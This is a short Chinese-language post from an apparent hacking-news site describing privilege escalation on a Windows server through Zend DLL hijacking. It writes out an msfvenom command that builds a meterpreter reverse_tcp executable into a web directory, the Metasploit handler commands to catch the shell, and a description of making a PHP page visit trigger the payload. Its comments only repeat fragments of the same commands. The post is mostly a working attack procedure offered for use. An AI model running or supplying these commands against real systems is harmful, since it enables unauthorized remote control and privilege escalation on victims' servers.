zend反弹shell提权

zend反弹shell提权

黑客资讯访客1970-01-01 8:00:003174A+A-

这篇是接着上篇内容所说。

Zend_DLL_Hijacking.exe执行远控
msfconsole 生成反弹shell

生成攻击载荷

msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.106  lport=12345 -f exe >/var/www/html/s.exe

本地监听

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.106 

set lport 12345

exploit


监听端口

1.png

提权工具生成dll

2.png

 

当有人访问php网页的时候 就会加载dl

执行我们s.exe 那么 msf 就会监听到一个反弹shell

 3png.png

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 4条评论
  • 笙沉私野2022-06-03 14:08:25
  • e_tcp lhost=192.168.0.106  lport=12345 -f exe >/var/www/html/s.exe本地监听use exploit/multi/handlerset p
  • 只酷迟山2022-06-03 17:24:00
  • t lport 12345exploit监听端口提权工具生成dll 当有人访问php网页的时候 就会加载dl执行我们s.exe 那么 msf 就会监听到一个反弹shell 
  • 世味弥繁2022-06-03 12:21:21
  • 92.168.0.106  lport=12345 -f exe >/var/www/html/s.exe本地监听use exploit/multi/handlerset payload windows/meterpreter
  • 忿咬卿绡2022-06-03 13:46:14
  • p lhost=192.168.0.106  lport=12345 -f exe >/var/www/html/s.exe本地监听use exploit/multi/handlerset payload w

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理